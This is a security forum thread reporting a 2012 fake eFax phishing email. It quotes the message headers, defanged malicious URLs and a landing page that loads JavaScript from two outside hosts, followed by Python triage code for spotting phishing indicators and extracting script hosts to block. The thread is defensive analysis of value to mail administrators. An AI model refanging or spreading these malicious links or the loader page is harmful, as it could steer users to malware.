DrStrange
Technically feasible
Premium
join:2001-07-23
West Hartford, CT
kudos:1

New Social Engineering Attack - Fake e-fax

Submitted for your perusal...

Got this forwarded from a customer this morning:

Return-path:
Envelope-to: customer@customers-domain.com
Delivery-date: Wed, 15 Aug 2012 09:41:45 -0500
Received: from exprod6mx202.postini.com ([64.18.1.102]:41217 helo=psmtp.com)
by customers-mailserver.com with smtp (Exim 4.77)
(envelope-from )
id 1T1en3-0002AH-LU
for customer@customers-domain.com; Wed, 15 Aug 2012 09:41:45 -0500
Received: from 186.214.162.105.static.host.gvt.net.br ([186.214.162.105]) by exprod6mx202.postini.com ([64.18.5.11]) with SMTP;
Wed, 15 Aug 2012 10:41:48 EDT
Received: from apache by pbhphpcqxchjeryyiraac. with local (Exim 4.63)
(envelope-from )
id 1FAPY2-D4VTNR-JT
for customer@customers-domain.com; Wed, 15 Aug 2012 11:41:47 -0300
To: customer@customers-domain.com
Subject: Corporate eFax message - 2 pages
Date: Wed, 15 Aug 2012 11:41:47 -0300
From: "eFax"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="------------04040100701010501050904"
X-pstn-levels: (S:11.98852/99.90000 CV:99.9000 FC:95.5390 LC:95.5390 R:95.9108 P:95.9108 M:95.5423 C:98.6951 )
X-pstn-dkim: 0 skipped:not-enabled
X-pstn-settings: 5 (2.0000:2.0000) s cv gt3 gt2 gt1 r p m c
X-pstn-addresses: from [81/4]

There was an HTML attachment that looked like an e-fax notification, except the links pointed to:

hxxp://szelo.nstrefa.pl/7b2VMt6D/index.html

That site tries to load JavaScript from two other websites:

--- 08/15/12 15:23:34 Eastern Daylight Time
--- reading URL hxxp://szelo.nstrefa.pl/7b2VMt6D/index.html
--- contacting host szelo.nstrefa.pl [91.203.134.164] on port 80

HTTP/1.1 200 OK
Date: Wed, 15 Aug 2012 19:23:37 GMT
Server: Apache
Last-Modified: Wed, 15 Aug 2012 19:01:27 GMT
Accept-Ranges: bytes
Content-Length: 237
Connection: close
Content-Type: text/html

[html]
WAIT PLEASE
Loading...
[script type="text/javascript" src="hxxp://modelsforfitness.com/WqrMdzkZ/js.js"][/script]
[script type="text/javascript" src="hxxp://nbecomputer.com/eSCz047F/js.js"][/script]

[/html]
--- connection closed

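The triage a mail admin would run on a report like this one, as an added example that is not part of the original post: it walks the Received: chain of the quoted headers to surface the tell-tales of a web-script origin (PHPMailer, local submission by the apache user, no DKIM, a display-name-only From, no hop belonging to the brand claimed in the subject) and pulls the third-party script hosts out of the landing page so they can be blocked and searched for in proxy logs. The raw headers are a constructed copy of the ones quoted above with RFC 5322 folding whitespace restored and the blank fields left blank; the landing page sample keeps the poster's hxxp defanging and uses real angle brackets.

```python
"""Triage helpers for a suspected fake-eFax phishing message (added example)."""
import re
from email import message_from_string

# Constructed sample: the headers quoted in the post, continuation lines
# re-indented so the parser folds them; empty fields stay empty.
RAW_HEADERS = """\
Return-path:
Envelope-to: customer@customers-domain.com
Delivery-date: Wed, 15 Aug 2012 09:41:45 -0500
Received: from exprod6mx202.postini.com ([64.18.1.102]:41217 helo=psmtp.com)
    by customers-mailserver.com with smtp (Exim 4.77)
    (envelope-from )
    id 1T1en3-0002AH-LU
    for customer@customers-domain.com; Wed, 15 Aug 2012 09:41:45 -0500
Received: from 186.214.162.105.static.host.gvt.net.br ([186.214.162.105]) by exprod6mx202.postini.com ([64.18.5.11]) with SMTP;
    Wed, 15 Aug 2012 10:41:48 EDT
Received: from apache by pbhphpcqxchjeryyiraac. with local (Exim 4.63)
    (envelope-from )
    id 1FAPY2-D4VTNR-JT
    for customer@customers-domain.com; Wed, 15 Aug 2012 11:41:47 -0300
To: customer@customers-domain.com
Subject: Corporate eFax message - 2 pages
Date: Wed, 15 Aug 2012 11:41:47 -0300
From: "eFax"
Message-ID:
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
MIME-Version: 1.0
Content-Type: multipart/alternative;
    boundary="------------04040100701010501050904"
X-pstn-dkim: 0 skipped:not-enabled
"""

# Constructed sample: the landing page body shown in the post, defanged (hxxp).
LANDING_PAGE_HTML = """\
<html>
WAIT PLEASE
Loading...
<script type="text/javascript" src="hxxp://modelsforfitness.com/WqrMdzkZ/js.js"></script>
<script type="text/javascript" src="hxxp://nbecomputer.com/eSCz047F/js.js"></script>
</html>
"""


def parse_received_chain(raw_headers):
    """Return one {'from', 'by', 'with'} dict per Received: header.

    Order is as the headers appear: index 0 is the last hop (nearest the
    recipient), the final entry is the first hop (where the mail was injected).
    """
    msg = message_from_string(raw_headers)
    hops = []
    for value in msg.get_all("Received", []):
        flat = " ".join(value.split())  # unfold and squeeze whitespace
        def grab(pattern):
            m = re.search(pattern, flat)
            return m.group(1) if m else ""
        hops.append({
            "from": grab(r"(?:^|\s)from (\S+)"),
            "by": grab(r"\bby (\S+)"),
            "with": grab(r"\bwith ([\w-]+)"),
        })
    return hops


def header_indicators(raw_headers, claimed_brand="efax"):
    """List the header-level reasons this message does not look like a fax gateway."""
    msg = message_from_string(raw_headers)
    hops = parse_received_chain(raw_headers)
    findings = []

    mailer = msg.get("X-Mailer", "").strip()
    if "phpmailer" in mailer.lower():
        findings.append(f"X-Mailer is {mailer!r}: generated by a PHP script, not a fax gateway")

    dkim = msg.get("X-pstn-dkim", "")
    if "skipped" in dkim or "not-enabled" in dkim:
        findings.append(f"filter reports no DKIM signature to verify ({dkim.strip()!r})")

    sender = msg.get("From", "").strip()
    if "@" not in sender:
        findings.append(f"From {sender!r} carries a display name but no sender address")

    if hops and hops[-1]["with"].lower() == "local":
        origin = hops[-1]
        findings.append(f"origin hop: submitted locally by user {origin['from']!r} on "
                        f"{origin['by']!r}, i.e. a web server sending mail")

    if not any(claimed_brand in h["from"].lower() or claimed_brand in h["by"].lower() for h in hops):
        findings.append(f"no host in the Received chain belongs to the brand {claimed_brand!r} named in From/Subject")
    return findings


SCRIPT_SRC_RE = re.compile(r'<script\b[^>]*\bsrc=["\']([^"\']+)["\']', re.IGNORECASE)


def external_script_hosts(html):
    """Hostnames of every external <script src> on the page, in order, deduplicated.

    Accepts both live (http) and defanged (hxxp) schemes so pasted IoCs work as-is.
    """
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        m = re.match(r"(?:hxxps?|https?)://([^/:]+)", src, re.IGNORECASE)
        if m and m.group(1).lower() not in hosts:
            hosts.append(m.group(1).lower())
    return hosts


if __name__ == "__main__":
    for hop in parse_received_chain(RAW_HEADERS):
        print("hop:", hop)
    for finding in header_indicators(RAW_HEADERS):
        print("flag:", finding)
    print("block/search for script hosts:", external_script_hosts(LANDING_PAGE_HTML))
```

Reading the chain bottom-up is the point: the first hop is `from apache ... with local`, which is a PHP script on a compromised web server handing mail to the local Exim, and the hop that reached the Postini filter is a static ISP address in Brazil, not anything resembling a fax provider. The two script hosts are what you would add to a web proxy block list and grep for in the day's proxy logs to find anyone who clicked.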


cbrigante2
Cubs 20??
Premium
join:2002-11-22
North Aurora, IL
Yep, a few of these came through on my mail server this morning.